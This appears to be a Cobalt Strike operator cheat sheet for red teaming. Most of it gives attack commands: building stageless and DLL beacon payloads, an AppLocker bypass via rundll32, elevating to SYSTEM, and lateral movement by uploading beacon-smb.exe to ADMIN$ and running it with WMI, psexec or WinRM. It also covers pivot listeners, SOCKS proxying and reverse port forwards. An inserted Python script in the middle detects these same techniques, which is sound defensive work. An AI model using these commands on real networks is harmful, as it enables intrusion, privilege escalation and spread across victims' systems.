Cobalt Strike --> Listeners --> Click the Add button and a New Listener dialogue will appear.
Choose a descriptive name such as <protocol>-<port>, for example http-80.
Set the variables and click Save.
Create a payload
OPSEC: Staged payloads are good if your delivery method limits the amount of data you can send. However, they tend to have more indicators compared to stageless. Given the choice, go stageless.
OPSEC: The use of 64-bit payloads on 64-bit Operating Systems is preferable to using 32-bit payloads on 64-bit Operating Systems.
Attacks --> Packages --> Windows Executable (S).
Create dll payload
Bypasses the default AppLocker configuration.
C:\Windows\System32\rundll32.exe C:\Users\Administrator\Desktop\beacon.dll,StartW
link <COMPUTERNAME>
Create peer-to-peer listener
Creating P2P listeners can be done in the Listeners menu, by selecting the TCP or SMB Beacon payload type.
Then create payload for the new listener!
Connect to beacon
Works like a bind shell. The most commonly used are SMB and TCP.
Run the payload on the target
Connect to the beacon with link for smb and connect for tcp.
connect <IP> <PORT>
link <IP>
Create pivot listener
To start a Pivot Listener on an existing Beacon, right-click it and select Pivoting --> Listener.
You might need to open the port on the firewall.
Upload and download files
upload <FILE>
download <FILE>
Take screenshots
printscreen Take a single screenshot via PrintScr method
screenshot Take a single screenshot
screenwatch Take periodic screenshots of desktop
Not all UAC bypasses are created equal; you can elevate to SYSTEM with:
Elevate to system
elevate svc-exe
Lateral movement
Jump
jump [method] [target] [listener]
Exploit      Arch   Description
-------      ----   -----------
psexec       x86    Use a service to run a Service EXE artifact
psexec64     x64    Use a service to run a Service EXE artifact
psexec_psh   x86    Use a service to run a PowerShell one-liner
winrm        x86    Run a PowerShell script via WinRM
winrm64      x64    Run a PowerShell script via WinRM
Remote-exec
remote-exec [method] [target] [command]
psexec   Remote execute via Service Control Manager
winrm    Remote execute via WinRM (PowerShell)
wmi      Remote execute via WMI
Using credentials
Each of these strategies is compatible with the various credential and impersonation methods described in the next section, Credentials & User Impersonation. For instance, if you have the plaintext
credentials of a domain user who is a local administrator on a target, use make_token and then jump to use that user's credentials to move laterally to the target.
cd \\<HOSTNAME>\ADMIN$
upload C:\Payloads\beacon-smb.exe
remote-exec wmi <HOSTNAME> C:\Windows\beacon-smb.exe
link <HOSTNAME>
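Each of the lateral movement methods above (a psexec-style service install, WinRM, WMI) and the rundll32 DLL launch from the payload section leaves a distinct host-side trace. The Python below is an added defender-side example, not code from the original page or from Cobalt Strike: it runs a few simple rules over constructed key=value event lines (made up for this example; the field names are assumptions, not a real SIEM schema) and flags processes spawned by WmiPrvSE.exe or wsmprovhost.exe, rundll32 loading a DLL from a user-writable path, and a new service whose binary lives on an ADMIN$ share.

```python
"""Defender-side triage of constructed Windows telemetry for the lateral-movement
and rundll32 patterns described above. All log lines below are constructed for
this example; the key=value schema and the heuristics are assumptions."""
import re
from dataclasses import dataclass
from typing import Optional, List

# Constructed sample events (not real telemetry). "proc" lines model process
# creation, "svc_install" lines model a System log 7045 "new service installed".
SAMPLE_EVENTS = [
    # WMI: remotely created processes are children of WmiPrvSE.exe.
    'type=proc host=WS01 image=C:\\Windows\\beacon-smb.exe parent=C:\\Windows\\System32\\wbem\\WmiPrvSE.exe cmd="C:\\Windows\\beacon-smb.exe"',
    # WinRM: commands run through WinRM are children of wsmprovhost.exe.
    'type=proc host=WS01 image=C:\\Windows\\System32\\cmd.exe parent=C:\\Windows\\System32\\wsmprovhost.exe cmd="cmd.exe /c whoami; hostname"',
    # rundll32 loading a DLL from a user-writable path and calling a named export.
    'type=proc host=WS02 image=C:\\Windows\\System32\\rundll32.exe parent=C:\\Windows\\explorer.exe cmd="C:\\Windows\\System32\\rundll32.exe C:\\Users\\Administrator\\Desktop\\beacon.dll,StartW"',
    # Service install whose binary sits on an ADMIN$ share (psexec-style).
    'type=svc_install host=WS03 service=f4a1c2d service_path=\\\\127.0.0.1\\ADMIN$\\f4a1c2d.exe start=demand',
    # Benign baseline lines that must not alert.
    'type=proc host=WS01 image=C:\\Windows\\System32\\notepad.exe parent=C:\\Windows\\explorer.exe cmd="notepad.exe"',
    'type=svc_install host=WS03 service=Spooler service_path=C:\\Windows\\System32\\spoolsv.exe start=auto',
]

KV_RE = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')
# Parent processes that indicate remote execution via WMI / WinRM.
REMOTE_EXEC_PARENTS = {"wmiprvse.exe": "wmi", "wsmprovhost.exe": "winrm"}
# rundll32 <dll>,<export> command-line shape.
RUNDLL_ARG = re.compile(r'(?i)rundll32\.exe"?\s+"?(?P<dll>[^,"]+)"?,(?P<export>\S+)')
# Paths a standard user can normally write to (heuristic, assumption).
USER_WRITABLE = re.compile(r'(?i)^[a-z]:\\users\\|\\programdata\\|\\windows\\temp\\')
# UNC path into a host's ADMIN$ share.
ADMIN_SHARE = re.compile(r'(?i)^\\\\[^\\]+\\admin\$\\')


@dataclass
class Finding:
    host: str
    technique: str
    detail: str


def parse_event(line: str) -> dict:
    """Parse a flattened key=value line into a dict; quoted values keep their spaces."""
    return {k: (quoted or bare) for k, quoted, bare in KV_RE.findall(line)}


def basename(path: str) -> str:
    """Lower-cased file name component of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def check_event(ev: dict) -> Optional[Finding]:
    """Apply the detection rules to one parsed event; None when nothing matches."""
    host = ev.get("host", "?")
    if ev.get("type") == "proc":
        parent = basename(ev.get("parent", ""))
        if parent in REMOTE_EXEC_PARENTS:
            return Finding(host, REMOTE_EXEC_PARENTS[parent],
                           f"{basename(ev.get('image', ''))} spawned by {parent}")
        if basename(ev.get("image", "")) == "rundll32.exe":
            m = RUNDLL_ARG.search(ev.get("cmd", ""))
            if m and USER_WRITABLE.search(m.group("dll")):
                return Finding(host, "rundll32-dll",
                               f"{m.group('dll')} export {m.group('export')}")
    elif ev.get("type") == "svc_install":
        path = ev.get("service_path", "")
        if ADMIN_SHARE.search(path):
            return Finding(host, "psexec-service",
                           f"service {ev.get('service', '?')} -> {path}")
    return None


def triage(lines: List[str]) -> List[Finding]:
    """Run every line through the rules and collect the findings in order."""
    findings = []
    for line in lines:
        finding = check_event(parse_event(line))
        if finding is not None:
            findings.append(finding)
    return findings


if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        print(f"[{f.host}] {f.technique}: {f.detail}")
```

The parent-process rules are the most robust of the four: WmiPrvSE.exe and wsmprovhost.exe as parents are inherent to how WMI and WinRM execute commands, whereas the ADMIN$ path and user-writable DLL checks are heuristics that a real deployment would tune against its own baseline.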
WMI exec commands
remote-exec winrm <HOSTNAME> whoami; hostname
CoInitializeSecurity
Beacon's internal implementation of WMI uses a Beacon Object File, executed using the beacon_inline_execute Aggressor function. When a BOF is executed, the CoInitializeSecurity COM function can be called, which sets the security context for the current process. According to Microsoft's documentation, this can only be called once per process. The unfortunate consequence is that if CoInitializeSecurity is called in the context of, say, "User A", then future BOFs may not be able to inherit a different security context ("User B") for the lifetime of the Beacon process.
If CoInitializeSecurity has already been called, WMI fails with access denied.
As a workaround, your WMI execution needs to come from a different process. This can be achieved with commands such as spawn and spawnas, or even execute-assembly with a tool such as SharpWMI.
Open Proxifier, go to Profile > Proxy Servers and Add a new proxy entry, which will point at the IP address and Port of your Cobalt Strike SOCKS proxy.
Next, go to Profile > Proxification Rules. This is where you can add rules that tell Proxifier when and where to proxy specific applications. Multiple applications can be added to the same rule, but in this example, I'm creating a single rule for adexplorer64.exe (part of the Sysinternals Suite).
Under Target hosts, fill in the target's internal network range, and set the Action to proxy through your SOCKS entry (<TARGET>).
NOTE: You will also need to add a static host entry in your C:\Windows\System32\drivers\etc\hosts file: . You can enable DNS lookups through Proxifier, but that will cause DNS leaks from your computer into the target environment.
Beacon's reverse port forward always tunnels the traffic to the Team Server, and the Team Server sends the traffic to its intended destination, so it shouldn't be used to relay traffic between individual machines.
Does not require administrator privileges.
rportfwd <BIND_PORT> <FORWARD_HOST> <FORWARD_PORT>
Stop port forward rportfwd
rportfwd stop <PORT>
Create port forward rportfwd_local
Beacon also has a rportfwd_local command. Whereas rportfwd will tunnel traffic to the Team Server, rportfwd_local will tunnel the traffic to the machine running the Cobalt Strike client.